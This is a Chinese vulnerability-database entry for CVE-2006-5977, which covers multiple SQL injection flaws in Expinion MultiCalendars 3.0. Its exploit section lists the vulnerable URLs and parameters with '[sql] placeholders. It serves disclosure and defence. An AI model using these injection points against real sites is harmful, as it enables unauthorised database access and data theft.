MultiCalendars 多个SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1192834 漏洞类型 SQL注入
发布时间 2006-11-20 更新时间 2006-11-20
CVE编号 CVE-2006-5977 CNNVD-ID CNNVD-200611-312
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://www.securityfocus.com/bid/87189
https://cxsecurity.com/issue/WLB-2006110086
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-312
|漏洞详情
MultiCalendars存在多个SQL注入漏洞。远程攻击者可以通过传给rss_out.asp的(1)M或(2)Y参数,或者传给all_calendars.asp的(3)cate参数来执行任意SQL命令。
|漏洞EXP
vendor site:http://www.expinion.net/
product:MultiCalendars
bug:injection sql
risk:medium

injection sql (get)
http://site.com/rss_out.asp?ID=1&MODE=1&M='[sql]
http://site.com/rss_out.asp?ID=1&MODE=1&M=10&Y='[sql]
http://site.com/all_calendars.asp?month=11&year=2006&cate='[sql]
http://site.com/all_calendars.asp?month=11&year=2006&cate=&ID=&cTYPE=2&c
alsids='[sql]

laurent gaffi & benjamin moss
http://s-a-p.ca/
contact: saps.audit (at) gmail (dot) com [email concealed]
|受影响的产品
Expinion.net MultiCalendars 3.0
|参考资料

来源:XF
名称:multicalendars-rssout-allcal-sql-injection(30301)
链接:http://xforce.iss.net/xforce/xfdb/30301
来源:BUGTRAQ
名称:20061115MultiCalendars[multiplesinjectionsql]
链接:http://www.securityfocus.com/archive/1/archive/1/451642/100/0/threaded
来源:SREASON
名称:1883
链接:http://securityreason.com/securityalert/1883